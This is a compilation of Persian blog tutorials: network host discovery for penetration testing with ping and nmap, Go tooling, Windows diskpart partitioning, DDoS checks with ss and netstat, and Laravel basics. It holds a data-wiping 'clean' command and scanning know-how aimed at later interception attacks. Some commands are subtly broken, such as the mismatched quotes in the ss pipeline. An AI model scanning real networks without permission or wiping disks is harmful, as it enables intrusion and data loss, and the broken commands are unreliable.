برای تست نفوذ یک شبکه یا دیوایس های درون شبکه اولین کاری که باید انجام شود این است که تمامی ای پی های فعال درون شبکه را اسکن و پیدا شوند که در قدم های بعدی تست نفوذ دقیقا بر روی دیوایس مورد نظر انجام شود که حملاتی نظیر حملات مرد میانی و اسنیف کردن شبکه انجام شود برای این کار نیاز به ابزار هایی خواهید داشت که در ادامه به معرفی ان ها می پردازیم.

آموزش پیدا کردن ای پی های فعال شبکه

در ابتدا اگر داخل ویندوز هستید در cmd دستور ipconfig و اگر درون لینوکس هستید دستور ifconfig را بزنید و ای پی خود را بردارید، برای پیدا کردن دیوایس های متصل در شبکه های کوچک می توانید از رنج ای پی خود به ترتیب به صورت دستی پینگ بگیرید و در صورتی که ای پی مورد نظر ping داشته باشد ان ای پی به یک دستگاه متصل است؛ برای مثال ای پی شما اگر 192.168.1.2 باشد باید با دستور زیر از ای پی بعدی در همان رنج به ترتیب پینگ بگیرید.

ping 192.168.1.3

اما روش بالا در شبکه های بزرگ تر امکان پذیر نیست و تست ای پی های در حال استفاده در شبکه به صورت دستی بسیار زمان بر خواهد بود که برای حل این مشکل ما از ابزار های مختلف که در این زمینه برای اسکن شبکه ساخته شده اند استفاده می کنیم که و انواع سیستم عامل ها ابزار های مختلفی وجود دارد.

پیدا کردن ای پی های فعال در شبکه با Advanced IP Scanner

این برنامه برای سیستم عامل های ویندوز طراحی شده و می توانید با استفاده از ان از طریق روش های اسکن پورت و پینگ ای پی های فعال درون شبکه را پیدا کنید. کافیست وارد برنامه شوید و از بخش بالا رنج ای پی خود را وارد کنید و بر روی Scan بزنید تا تمامی رنج ای پی شما اسکن شود، و در بخش پایین ان تمامی اطلاعات ای پی ها را می توانید مشاهده نمایید.

اسکن ای پی با nmap

ابزار nmap در کالی لینوکس به صورت پیشفرض وجود دارد، اما می توانید در دستگاه های مختلف ان را نصب کنید. این ابزار قدرتمند امکان اسکن پورت و ای پی های شبکه را به شما می دهد برای مثال به دستور زیر توجه کنید :

nmap 192.168.1.1-255

با دستور بالا پورت های پیشفرض در رنج ip ها اسکن می شوند

و در صورت فعال بودن ان ها را در خروجی نمایش می دهد.

نحوه پیدا کردن ای پی های فعال شبکه در اندروید

برنامه های زیادی برای اسکن شبکه در اندروید وجود دارد که می توان از ان ها استفاده کرد، اما یکی از بهترین این برنامه ها fing است که می توانید در دستگاه اندرویدی خود نصب کرده و یک اسکن و انالیز کامل در شبکه داخلی خود انجام دهید.

لینک دانلود ابزار ها

Advanced IP Scanner

Fing

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

برنامه نویسی Go قسمت ششم

در این قسمت یعنی قسمت آخر مجموعه پست‌های آشنایی با زبان برنامه نویسی Go، با کتابخانه‌ها و ابزارهای مهم زبان گو آشنا می‌شویم، و در ادامه به روش یادگیری این زبان می‌پردازیم. با هیتوس همراه باشید.

کتابخانه استاندارد Go یکی از جامع ترین کتابخانه‌های موجود در بین تمام زبان‌های برنامه نویسی است. از طرفی چون Go یک زبان نو ظهور است، طراحی کتابخانه در حالت بسیار تمیز و یکپارچه‌ای قرار دارد.

Package‌هایی برای آرشیو و فشرده سازی: tar, zip, bzip2, flate, gzip, lzw, zlib

Package‌هایی برای رمزنگاری و عملیات هش: aes, cipher, des, dsa, rc4, rsa, md5, sha1, sha256, sha512, tls, x509

Package‌هایی برای کار با فایل‌های مختلف: base32 ,base64, binary, csv, gob, hex, pem, json, xml

Package‌هایی برای کار با گرافیک دو بعدی: color, draw, gif, jpeg, png

Package‌هایی برای کار با مباحث شبکه: html, cgi, fcgi, mail, url, jsonrpc

ذات سیستمی زبان Go در اینجا مشخص می‌شود. تمام Package‌های بالا در Go نوشته شده اند. برای داشتن خیلی از این Package‌ها در زبان‌های دیگر، باید متوسل به کتابخانه‌های نوشته شده در زبان C می‌شدیم.

خوبی Go در این است که برای اعمال سطح پایین دیگر نیازی به C نیست. Go در واقع همان C مدرن است، از طرف همان کسانی که روزی C و Unix را به شما معرفی کرده بودند!

همه Package‌های بالا را همراه کنید با Package‌هایی برای عملیات ریاضی، زمان، و تاریخ، محیط سیستم عامل، پایگاه داده، ورودی و خروجی، رشته ها، پردازش و Parse کردن متن و .

در ضمن کتابخانه استاندارد با یک HTTP Server داخلی همراه است که به راحتی می‌توان آن را با Nginx یا Node.js مقایسه کرد. در واقع، اکثر سایت‌هایی که در ابتدای این نوشته به آن‌ها اشاره شد هم از همین Server داخلی برای خدمات رسانی به کاربرانشان استفاده می‌کنند.

همچنین در کتابخانه استاندارد Go یک سیستم Template Engine ارایه شده تا برنامه نویسی وب را برای شما آسان تر کند. با این حساب، احتمالا متوجه شده اید که برنامه نویسی وب در Go، نیاز چندانی به فریم‌ورک‌های مرسوم در زبان‌های دیگر نخواهید داشت. کتابخانه استاندارد Go همه چیز را از قبل برایتان مهیا کرده است.

از نظر مستندات، Go در جایگاه بسیار خوبی قرار دارد و برای تمام Package‌ها و تک تک توابع و پارامترهای شان به طور کامل مستندات وجود دارد.

اگر زبان انگلیسی شما در حد مطلوبی قرار دارد (که به عنوان یک برنامه نویس باید هم این چنین باشد) در زمینه یادگیری Go با هیچ مشکلی مواجه نخواهید شد و نیاز به هیچ کتاب و منبع خاصی نخواهید داشت؛ چرا کهمستندات موجود در سایت زبان به اندازه کافی کامل و مناسب است.

با این که زمان زیادی از انتشار نسخه پایدار نمی‌گذرد، اما Go ابزارهای جانبی نستباٌ کاملی در اختیار دارد:

ابزار Go که کار کامپایل و نصب Package را آسان کرده است. این ابزار حتی قابلیت این را دارد که Package‌ها را به صورت اتوماتیک از سایت‌هایی مثل Github دریافت و نصب نماید!

ابزار Godoc قادر است سایت golang.org را به صورت محلی در کامپیوتر شما اجرا کند. سایت اصلی golang.org هم به کمک همین ابزار در حال اجراست. همچنین godoc می‌تواند مستندات مربوط به Package‌ها و توابع آن‌ها را مستقیما در ترمینال نمایش دهد.

ابزار Gofmt استایل کد نویسی شما را مدیریت می‌کند. برای مثال هرکدام ازا عضای تیم می‌توانند استایل خودنویسی خودشان را داشته باشند، اما در نهایت از Gofmt برای یپارچه کردن استایل کدهای پروژه استفاده کنند.

ابزار Gocode هم برای کمک به ادیتورها و IDE‌ها طراحی شده. این ابزار بررسی کدهای شما اطلاعات موجود در آن‌ها را استخراج کرده و در اختیار ادیتورها و IDE‌های می‌گذارد. آن‌ها هم می‌توانند از این اطلاعات برای پیاده سازی قابلیت Auto completion استفاده نمایند.

مهم ترین ابزار کار هر برنامه نویس ویرایشگر متن است. خوشبختانه Go از پشتیبانی خوبی در این زمینه برخوردار است. در رابطه با ویرایشگرهای ساده و سبک، Go از Kate و Notepad++ و BBEdit و Gedit و . به صورت رسمی پشتیبانی می‌کند.

برای کسانی که با ویرایشگرهای حرفه‌ای کدنویسی می‌کنند، Go پشتیبانی رسمی و کاملی را برای ویرایشگرهای بی رقیب Vim و Emacs ارائه کرده است. در واقع از آنجایی که تیم سازندگان Go و اکثر جامعه کابران آن نیز با همین ابزارها کدنویسی می‌کنند، پشتیبانی از این دو از اولویت بسیار بالایی برخوردار است.

در Go همانند دیگر زبان‌های کامپایلری نیاز خاصی به وجود IDE حس نخواهید کرد؛ اما برای کسانی که کار با IDE‌ها را ترجیح می‌دهند، Go از پشتیبانی مناسبی برای IDE‌های Eclipse و Intellig برخوردار است.

از کجا کار با Go را شروع کنیم؟

مستقیم به سایت golang.org بروید و پکیج مربوط به سیستم عامل خود را دانلود و نصب نمایید. برای خواندن مستندات هم به قسمت Documents سایت بروید. این قسمت بسیار جالب دسته بندی شده است. برای آشنایی با Go کافی است به ترتیب لینک‌های این صفحه را از بالا به پایین مطالعه کنید. دقت کنید که رعایت ترتیب در خواندن لینک‌ها بسیار به شما کمک خواهد کرد.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش پارتیشن بندی ویندوز

بر اثر استفاده های زیاد در مرور زمان، عمر هارد دیسک ها کمتر شده و یا با گذشت زمان حافظه ذخیره سازی آنها پر شده و نیاز به یک هارد دیسک جدید و پرسرعت تر احساس می شود. در این پست نحوه پارتیشن بندی انواع حافظه های ذخیره سازی اعم از هارد دیسک یا حافظه های خشک SSD یا حافظه های قابل حمل مثل هارد اکسترنال یا فلش را آموزش می دهیم.

بطور کلی در ویندوز ۲ نوع هارد درایو شناخته می شود:

Basic : که از ویندوز ۸.۱ به بعد خاصیت RAID (قابلیتی است که یک پارتیشن روی هارد دیسک باشد و هر اطلاعات از پارتیشن اول بر روی پارتیشن نظیر در هارد دیسک دوم نوشته شود) به هارددیسک Basic اضافه شد.
Dynamic : در این حالت می‌توانیم از خاصیت RAID استفاده کنیم.

انواع پارتیشن هایی که میتوان ایجاد کرد دو نوع می‌باشد:

Primary که قابلیت بوتیبل (Bootable) کردن دارد.
Extended که قابل تقسیم به logical درایو را دارد.

پارتیشن بندی در ویندوز

برای پارتیشن بندی در ویندوز در صفحه‌ی انتخاب هارد هنگام نصب کلید ترکیبی shift+f10 را بزنید.

بدین ترتیب صفحه‌ی command prompt باز می شود.

دستور زیر را وارد کنید. از آنجایی که این دستور نیاز به دسترسی ادمین دارد پس وارد کردن دستور شما باید اجازه دسترسی برای تغییرات در هارددیسک را به نرم‌افزار دهید

diskpart

سپس دستور زیر را وارد کنید. این دستور برای مشاهده هارد دیسک های متصل شده به مادربرد کامپیوتر بکار میرود تا در صورت وجود اتصال چند هارد دیسک مختلف دستگاهی را انتخاب کنید که نیاز به پارتیشن بندی آن دارد.

list disk

تنها راه شناخت هارد دیسک ها فضای ذخیره سازی آنها می‌باشد. اگر تمامی هارد دیسک های شما فضای ذخیره سازی یکسان داشته باشند با توجه به اسلات های هارد دیسک در مادربرد در لیست نشان داده می شوند.

هاردی را که میخواهید پارتیشن بندی کنید را با دستور زیر انتخاب کنید. (برای انتخاب دستور را تایپ کرده و شماره آن را با یک فاصله وارد کنید)

1	select disk 0

** توجه داشته باشید که در صورت انتخاب هارد، در صورت تغییرات پارتیشن تمامی اطلاعات آن پاک می‌شود. پس قبل از این کار اطلاعات خود را از روی هارد پشتیبان تهیه کنید.

اگر هارد شما از قبل پارتیشن داشته باشد از دستور زیر استفاده کنید. (با این دستورات تمامی پارتیشن ها و اطلاعات هارد شما پاک میشود)

clean

با توجه به نیاز خود پارتیشن های لازم را ایجاد می‌کنیم. برای ساخت پارتیشن bootable از دستور زیر استفاده کنید.

1	؟=Create partition primary size

بجای علامت سوال سایز مورد نیاز خود را بر اساس مگابایت Mb وارد کنید. اگر میخواهید فضای پارتیشن خود عددی رند باشد میزان گیگابایت آنرا به عدد ۱۰۲۴ ضرب کنید. برای مثال ۶۰*۱۰۲۴= ۶۱۴۴۰ عدد بدست آمده را بجای علامت سوال وارد کنید. (بدون فاصله)

مقدار حافظه‌ای که برای این پارتیشن اختصاص میدهید باید به اندازه کافی باشد زیرا اگر مقدار آن کم باشد سیستم عامل خطا داده و نصب نمی شود در صورت اختصاص دادن فضای خیلی زیاد، مدت زمان بوت شدن سیستم عامل را زیاد میکند پس اختصاص مقدار فضای کافی بسیار مهم می باشد.

برای مثال می خواهید ویندوز ۱۰ نسخه پرو نصب کنید. ۶۰ گیگ برای سیستم عامل نیاز دارید این مقدار برای نصب لازم می‌باشد اما کافی نیست زیرا سیستم عامل بعد از مدتی فایل هایی به پارتیشن اضافه می کند از طرفی در صورت نصب برنامه های مختلف (حتی در پارتیشن های دیگر) فایل سیستمی آن برنامه در این پارتیشن ذخیره می شود پس مقداری فضای ذخیره سازی نیز برای این منظور لحاظ کنید. بطور میانگین با استفاده معمولی از سیستم عامل ۸۰ گیگ مناسب این پارتیشن می باشد. با این حال اگر کاربر حرفه ای هستید میتوانید این فضا را بیشتر هم در نظر بگیرید.

با دستور زیر پارتیشن بوتیبل ما فعال شده و قابل استفاده می شود توجه داشته باشید که اگر این دستور را وارد نکنید کامپیوتر هارد شما را نمی شناسد.

Active

با دستور زیر یک حرف برای پارتیشن مورد نظر انتخاب می کنیم. بجای علامت سوال حرف انگلیسی تایپ کنید.

1	؟ Assign letter

توجه کنید اگر پارتیشن بوتیبل برای نصب سیستم عامل ساختید از حرف c استفاده کنید تا اولین پارتیشن شما نشان داشته شود.

1	Format fs=ntfs quick

یکبار هارد خود را فرمت کنید سپس به ادامه کار خود بپردازید.

تعداد پارتیشن هایی که برای یک هارد میتوان ساخت ۴ پارتیشن بوتیبل میباشد اما در صورت ساخت پارتیشن اکستند فقط ۱ پارتیشن از این نوع میتوانید بسازید و تعداد پارتشین بوتیبل به ۳عدد کاهش می یابد. برای استفاده از پارتشین اکستند باید آن را به پارتیشن های لاجیکال تقسیم بندی کنید که این پارتیشن تعداد دلخواه شما را پشتیبانی می‌کند.

بعد از ساخت پارتیشن بوتیبل یا پرایمری باقی حافظه خود را می توانید پارتیشن اکسنتدد بسازید. توجه داشته باشید که در این نوع پارتیشن نمی توان سیستم عامل نصب کرد یعنی هنگام بوت شدن، کامپیوتر این پارتیشن را نمی شناسد.

در واقع این پارتیشن برای حفاظت از اطلاعات کابر می‌باشد تا در صورت خرابی سیستم عامل فقط پارتیشن بوتیبل فرمت شده و اطلاعات کاربر محفوظ بماند.

1	=Create partition extended size

اگر می خواهید باقی حافظه خود را پارتیشن از نوع اکستندد بسازید لازیم نیس در دستور به آن سایزی اختصاص دهید. در این حالت سیستم به طور خودکار باقی فضای حافظه را به پارتیشن اکستندد اختصاص می دهد.

برای استفاده از پارتیشن اکستند می بایست آن را به قسمت های کوچک تر به نام پارتیشن لاجیکال تقسیم کرد بسته به نیاز خود این تقسیم بندی را انجام دهید.

1	=Create partition logical size

بعد از هربار تقسیم بندی یک حرف به آن اختصاص دهید.

1	? assign letter

دستورفرمت برای هارد لازم می باشد.

1	Format fs=ntfs quick

بعد از فرمت کردن میتوانید پارتیشن های خود را با دستور زیر مشاهده کنید.

1	List volume

توصیه می شود قبل از انجام پارتیشن بندی از اطلاعات خود پشتیبان تهیه کنید.

dedsec will give you the truth
join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

تشخیص و چک کردن حملات دیداس

DDOS یا DOS حملاتی هستند که باعث از دسترس خارج شدن سرور و یا سایت می شوند که به ان ها حملات تکذیب سرویس هم می گویند، به طور کلی در صورتی که حمله از طریق چندین سیستم و سرور انجام شود DDOS می گویند و در صورتی که از طریق یک سیستم یا سیستم های کمتری انجام شود حملات DOS می گویند.

نحوه تشخیص و چک کردن حملات دیداس

این حملات انواع مختلفی دارند که هر کدام ممکن است از روش های متفاوتی باشند ما در این اموزش مهم ترین بخش های سرویس ها را برای برسی امنیت ان ها و جلوگیری از دیداس خواهیم گفت. دقت داشته باشید برای برخی از این روش ها نیازمند سطح دسترسی بالا در سیستم عامل سرور هستید.

پینگ

یکی از رایج ترین حملات از طریق ارسال پکت بزرگ به صورت پینگ است که شما می توانید برای برسی ان دستور زیر را در ترمینال یا Cmd ویندوز خود بزنید تا ببنید سرویس شما پینگ دارد یا خیر در صورت نداشتن احتمالا حمله از طریق پینگ بوده و باید پینگ سرور را ببندید.

ping ip -t

حمله به پورت های مهم سرور

در اولین قدم پورت های باز اضافه سرور را مسدود کنید و در قدم بعدی اتصالات پورت را چک کنید :

ss -tan state established | grep :80\|:443” | awk ‘{print $4}’| cut -d’:’ -f1 | sort -n | uniq -c | sort -nr

با استفاده از دستور بالا تمامی ای پی های متصل به پورت 80 و 443 را

5 توزیع لینوکس شبیه ویندوز

می توانید برای چک کردن حملات دیداس مشاهده کنید،

و در صورتی که ای پی حمله کننده را مشاهده کرده اید ان را از طریق فایروال مسدود کنید.

برای انجام این کار در ویندوز از دستور زیر با استفاده از netstat اتصالات پورت 80 را چک کنید :

netstat -n | grep :80 |wc –l

برسی لاگ ها برای چک کردن حملات دیداس

نکته : در صورتی که به سرور دسترسی ندارید ان را از طریق پنل مدیریت خودبرای کاربران مسدود کنید و به صورت لوکال متصل شوید تا بتوانید از این روش استفاده کنید در برخی موارد هم امکان دسترسی به سرور را خواهید داشت اما بخش هایی از ان از دسترس خارج شده است که در این صورت چک کردن حملات دیداس و جلوگیری از ان راحت تر خواهد بود

برای تشخیص حملات دیداس می توانید به لاگ فایل های سرور مراجعه کنید که محل هر کدام از ان ها بسته به نوع وب سرور شما متفاوت است و باید ان را جستجو کنید و بعد از پیدا کردن ان بیشترین ای پی هایی که در خواست فرستاده اند را مسدود کنید. برای جستجو لاگ فایل ها می توانید از دستور زیر استفاده کنید.

locate access.log

برخی روش های امنیتی برای جلوگیری از حملات دیداس

استفاده از فایروال های مناسب
کنترل دائم سرور
مانیتورینگ سرور برای چک کردن حملات دیداس
برسی لاگ ها به صورت دوره ای
استفاده از کلودفلر

نتیجه گیری

در دنیای اینترنت مشکلات امنیتی بسیار زیادی وجود دارد و به همین خاطر دائما ممکن است در خطر این حفره های امنیتی باشیم یکی از حملات رایج هم میتوان گفت حملات دیداس است که باید به موقع دشخیص داده شوند و از ان جلوگیری شود ما در این اموزش به موارد امنیتی برای چک کردن حملات دیداس پرداخته ایم.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش Laravel قسمت سوم

مسیریابی و Controller‌ها یکی از مهم ترین بخش‌های یک نرم افزار تحت MVC هستند. که در این بخش قصد داریم شما را با مسیریابی و Controller در فریم‌ورک لاراول آشنا کنیم.

همانطور که در قسمت دوم آموزش فریم‌ورک لاراول ذکر شد، فایل مسیریابی در لاراول در مسیر app -> Http -> routes.php قرار گرفته است؛ با استفاده از این فایل است که به عنوان مثال برای برنامه خود مشخص می‌کنید وقتی کاربر صفحه /about را در خواست کرد، چه اطلاعاتی به او نمایش داده شود.

اطلاعات پیش فرض این فایل به شکل زیر است:

Route::get('/', function () {
    return view('welcome');
});

مسیر یابی فوق اعلام می‌کند وقتی کاربر صفحه اصلی یعنی / را در خواست کرد به او فایل view با نام welcome.blade.php را از آدرس resources -> views برای من باز کن.

در فایل welcome.blade.php هر چه برای نمایش وجود داشته باشد نمایش داده می‌شود که در قسمت دوم از آموزش لاراول به شما گفتیم چگونه با ویرایش این فایل پیام Hello World! را به نمایش در آورید.

در این آموزش ابتدا یک Controller ایجاد می‌کنیم و می‌بینیم چگونه با استفاده از Controller به صفحه نمایش خود مقدار ارسال کنیم.

controller‌ها فایل‌هایی هستند که اصلی ترین بخش سورس کد برنامه ما در آن‌ها قرار می‌گیرد. وظیفه روتر هدایت کاربر به سمت Controller مناسب است. Controller پس از انجام محاسبات و یا آماده کردن خروجی آن را به فایل‌های قالب ارسال می‌کند.

ابتدا سورس کدهای موجود در فایل routes.php را حذف کرده و به جای آن‌ها مسیر زیر را قرار می‌دهیم:

Route::get('/', 'MainController@index');

دستور فوق می‌گوید هنگام در خواست "/" به کنترلی به نام MainController و تابع index مراجعه کن.

برای ایجاد Controller از دستور زیر در artisan استفاده می‌کنیم و یک Controller به نام MainController ایجاد می‌کنیم:

php artisan make:controller MainController

فایل فوق در آدرس app -> Http -> Controllers ایجاد می‌شود.

نکته: البته اامی وجود ندارد که از artisan برای ایجاد Controller استفاده کنید، و می‌توانید فایلی مانند زیر ایجاد کنید:

<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Http\Requests;
class MainController extends Controller
{
    //
}

نام این Controller به نام کلاس است. می‌توانید هر فایل دیگری با سورس فوق ایجاد کنید و در آن تنها نام کلاس Controller و نام فایل را به یک نام متفاوت تغییر دهید.

حال دستورات زیر را درون کلاس MainController اضافه می‌کنیم:

public function index()
{
   echo "Hello dedsec!"; die();
}

وقتی صفحه "/" را در خواست دهید پیام Hello I'm From Controller به نمایش در می‌آید.

حال می‌خواهیم با استفاده از تابع فوق، view را نمایش دهیم. تابع index را به شکل زیر در می‌آوریم:

public function index()
{
   $name= "dedsec-hack.blog.ir";
   return view('welcome', ['name' => $name]);
}

در سطر سوم یک متغیر به نام $name تعریف کردیم. در سطر چهارم با دستور return view یک قالب با نام welcome را از مسیر resources -> views فراخوانی کرده و به آن متغیر name را ارسال می‌کنیم.

سورس کدهای موجود در فایل welcome.blade.php را به شکل زیر ویرایش می‌کنیم:

{{$name}}

البته در لاراول امکان return کردن مقادیر به روش‌های دیگر نیز وجود دارد:

روش اول:

public function index()
{
   $name= "dedsec-hack.blog.ir";
   return view('welcome', compact('name'));
}

روش دوم:

public function index()
{
   $name= "dedsec-hack.blog.ir";
   return view('welcome')->with('name', $name);
}

روش سوم:

public function index()
{
   $name= "dedsec-hack.blog.ir";
   return view('welcome')->withName($name);
}

روش‌های فوق را بیشتر توضیح نمی‌دهیم و با تست کردن متوجه طرز عملکردشان شوید.

نکته: در نسخه‌های قبلی laravel به جای view از View::make استفاده می‌شد که همچنان نیز عمل می‌کند.

نکته: می توان لایه نمایش را به منظور نظم بیشتر در پوشه‌های خاصی در مسیر resources -> views قرار داد. برای مسیر دهی در Controller نیز از یکی از دو روش زیر استفاده می‌کنیم:

return view('folder_name.template_name', ['name' => $name]);

return view('folder_name/template_name', ['name' => $name]);

نام گذاری روترها

تقریبا برای هر عملیاتی در فریم‌ورک باید یک Router جدید بنویسید. هر Router با توجه به ماهیتی که دارد می‌تواند نام‌های متنوعی داشته باشد.

مثلا فرض کنید یک Cms دارید و در این Cms می‌خواهید یک پست را نمایش دهید. برای داشتن چنین مسیری می‌توانیم یک Router مانند زیر ایجاد کنیم:

Route::get('/show/{id}', 'MainController@show');

در Controller یک تابع به شکل زیر ایجاد می‌کنیم:

public function show($id)
{
    return $id;
}

مسیریابی فوق خیلی ساده است، اگر صفحه /show/1 را در خواست دهید مقدار 1 را نمایش می‌دهد. هر چیزی به عنوان id قرار دهیم در خروجی چاپ می‌شود.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش Laravel قسمت دوم

نصب لاراول را در این پست به شما آموزش می‌دهیم. شاید اولین سورسی که در هر زبان برنامه نویسی و یا فریمی نوشته می‌شود سورسی است که متن معروف Hello World را چاپ کند. در این پست به عنوان اولین پروژه در لاراول Hello World را چاپ می‌کنیم.

پیش نیازهای نصب لاراول عبارتند از:

PHP نسخه بالاتر مساوی 5.6.4
فعال بودن افزونه OpenSSL PHP
فعال بودن افزونه PDO PHP
فعال بودن افزونه Mbstring PHP
فعال بودن افزونه Tokenizer PHP
فعال بودن افزونه XML PHP

در سایت لاراول برای نصب فریم‌ورک لاراول توصیه شده است از Composer استفاده کنید.

برای نصب لاراول با کامپوزر از دستور زیر استفاده کنید:

composer create-project laravel/laravel

وقتی کامند فوق را نصب کردیم با صفحه ای روبرو می‌شویم

اگر به هر دلیلی نمی‌خواهید از کامپوزر استفاده کنید می‌توانید آخرین نسخه لاراول را دانلود کنید

پس از نصب لاراول با پوشه‌های این فریم‌ورک مواجه می‌شوید که شاید برای دید اول کمی استرس آور باشند! ولی اصلا نگران نباشید در ادامه قراره به ساختار پوشه‌ها در فریم‌ورک Laravel آشنا شوید.

پوشه‌ها و فایل‌های مهم لاراول عبارتند از:

1) app -> Http -> routes.php
2) app -> Http -> Controllers
3) resources -> views
4) resources -> assets
5) public
6) vendor
7) composer.json
8) .env
9) database
10) config

1) در این فایل اطلاعات مربوط به مسیرهای نرم افزار قرار می‌گیرند.

2) در این پوشه فایل‌های اصلی برنامه که ساز و کار برنامه را معین می‌کنند قرار می‌گیرند.

3) در این پوشه پوسته نرم افزاری که در حال برنامه نویسی آن هستیم گرد هم جمع می‌شوند.

4) در این پوشه منابعی مانند فایل‌های sass یا less و یا فایل‌های جاوا اسکریپت قرار می‌گیرند.

5) در این پوشه فایل‌هایی مانند index.php و .htaccess که برای نمایش نرم افزار باید آن‌ها را اجرا کنیم گرد هم می‌آیند. فایل‌هایی مانند CSS‌ها و JavaScript‌ها را نیز می‌توانید این جا مجتمع کنید.

6) تمام کتابخانه‌های نرم افزار در این پوشه قرار می‌گیرند. از جمله laravel و symfony و monolog و دیگر کتابخانه ها.

7) برای مدیریت کتابخانه‌های موجود در لاراول از این فایل استفاده می‌شود.

8) از این فایل برای انجام پیکربندی نرم افزار خود استفاده می‌کنیم.

9) پوشه database محل قرار گیری فایل‌های مربوط به پایگاه داده است. مثلا در پوشه migrations فایل‌هایی قرار می‌گیرد که با کمک آن‌ها جداول پایگاه داده ایجاد می‌شوند.

10) این پوشه محل قرار گیری فایل‌های پیکربندی پروژه لاراول است.

نمایش Hello World در لاراول

برای ایجاد این پیام در لاراول ابتدا باید به فایل مسیریابی با آدرس app -> Http -> routes.php یک نگاهی بیندازید:

Route::get('/', function () {
    return view('welcome');
});

در قسمت سوم آموزش به صورت تفصیلی به مبحث Routing می‌پردازیم، فقط به صورت خلاصه بیان کنیم که معنای این دستور این است که وقتی کاربر صفحه / را در خواست کرد برایش صفحه نمایش welcome.blade.php را از مسیر resources -> views به نمایش در بیاورد.

محتویات فایل welcome.blade.php عبارتند از:

<!DOCTYPE html>
<html>
    <head>
        <title>Laravel</title>
        <link href="https://fonts.googleapis.com/css?family=Lato:100" rel="stylesheet" type="text/css">
        <style>
            .
        </style>
    </head>
    <body>
        <div class="container">
            <div class="content">
                <div class="title">Laravel 5</div>
            </div>
        </div>
    </body>
</html>

اجرا کردن پروژه‌های Laravel

برای اجرا کردن پروژه Laravel در سیستم خود دو روش دارید، اولی استفاده از ابزار artisan است و دومی قرار دادن پروژه خود در پوشه htdocs و یا www سرور مجازی و اجرا کردن فایل index مسیر public لاراول. اگر از ابزار artisan استفاده کنید مهم نیست پروژه خود را در کجای سیستم خود قرار دهید.

برای استفاده از artisan، کامند لاین را باز کرده و مسیر پروژه لاراول را با کامند لاین باز کنید. در این مسیر دستور زیر را وارد کنید:

php artisan serve

پس از وارد کردن دستور فوق پنجره‌ای به نمایش در می‌آید

در پنجره فوق اعلام شده است که با وارد کردن آدرس http://localhost:8000/ در مرورگر می‌توانید برنامه خود را مشاهده کنید. تا وقتی که صفحه کامند لاین باز باشد می‌توانید از این آدرس استفاده کنید و همانطور که در بالا گفته شد مهم نیست پروژه خود را کجای سیستم خود قرار داده اید، و حتی از فلش و یا هارد دیسک اکسترنال خود می‌توانید به راحتی اجرا کنید.

اگر به هر دلیلی نخواستید از روش artisan استفاده کنید می‌توانید در مرورگر خود و از مسیر دایرکتوری پروژه خود آدرس /public/index.php را در مرورگر وارد کنید.

در فایل welcome.blade.php خط <div class="title">Laravel 5</div> را با <div class="title">Hello World! <br> I'm dedsec</div> عوض کنید. با در خواست مجدد صفحه اصلی پیغام مورد نظر را مشاهده

می‌کنید

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش Laravel قسمت اول

فریم‌ورک لاراول سال هاست در حال توسعه است ولی در سال 2015 به شدت مورد استقبال قرار گرفت و برنامه نویسان زبان PHP را به خود مشغول کرد. این فریم‌ورک در نظر سنجی‌ها و تست‌های نرم افزاری نتایج جالبی بدست آورده است. که در شروع این نمودارها را با هم بررسی می‌کنیم.

دلیل استقبال کاربران از فریم‌ورک لاراول پایداری، قدرت، سادگی و کم بودن باگ‌های نرم افزاری است.

آقای Taylor Otwell اولین نسخه از این فریم‌ورک را در سال 2011 منتشر کرد ولی در سال 2015 بود که این فریم‌ورک به سرعت محبوب شد و مورد توجه علاقه مندان به توسعه نرم افزار قرار گرفت.

با لاراول چه برنامه‌هایی می‌توان تولید کرد؟

با لاراول هر چیزی می‌توان نوشت! از یک نرم افزار ساده برای نمایش Hello World تا یک نرم افزار بسیار حرفه‌ای و پیچیده مانند شبکه‌های اجتماعی با میلیون‌ها کاربر. در استفاده از هر فریم‌ورک دقت داشته باشید که فریم‌ورک فقط یک ابزار است که کار توسعه نرم افزار را برای شما بسیار ساده تر، سریع تر و امن تر می‌کند.

لاراول بدلیل پتانسیل‌های بالایی که دارد در اجرای هر نرم افزاری شما را یارای می‌کند و مانع سردرگمی در پروژه‌های سنگین می‌شود.

بسیاری از شرکت‌های بزرگ برای توسعه نرم افزارهای خود به لاراول روی آورده اند از این نظر یادگیری لاراول می‌تواند برای شما یک بازار کار خوب و عالی فراهم سازد.

ویژگی‌های قدرتمند لاراول

سیستم مسیریابی آسان و قدرتمند: لاراول بر اساس MVC طراحی شده است پس یکی از مهم ترین بخش هایش بخش مسیریابی است. مسیریابی به معنای آدرس دهی ساده برای انجام دهی عملیات است. مثلا شما به برنامه خود اعلام می‌کنید مسیر /blog به نمایش محتویات بلاگ نرم افزار شما اختصاص بیابد. مبحث مسیریابی خود به تنهایی مبحث پیچیده و گاهی اوقات پر ریسکی است ولی با سیستم Routing لاراول این چالش به سادگی حل شده است.

ماژولار بودن: قابلیت‌های ماژولار بودن در این فریم‌ورک، قدرت دو چندان به آن بخشیده است. این قابلیت به این معناست که تقریبا تمام بخش‌های لاراول در بسته‌های جدا مسئولیت خدمت رسانی به نرم افزار شما را بر عهده دارند. مثلا یک ماژول وظیفه ایفا کردن نقش ارتباطات با دیتابیس، و یک ماژول وظیفه نمایش لایه خروجی را انجام می‌دهد. خاصیت این بخش در اینجا مشخص می‌شود که اگر خواستیم به راحتی می‌توانید بخش مورد نظر را به یک ماژول دیگر جایگزین کنید.

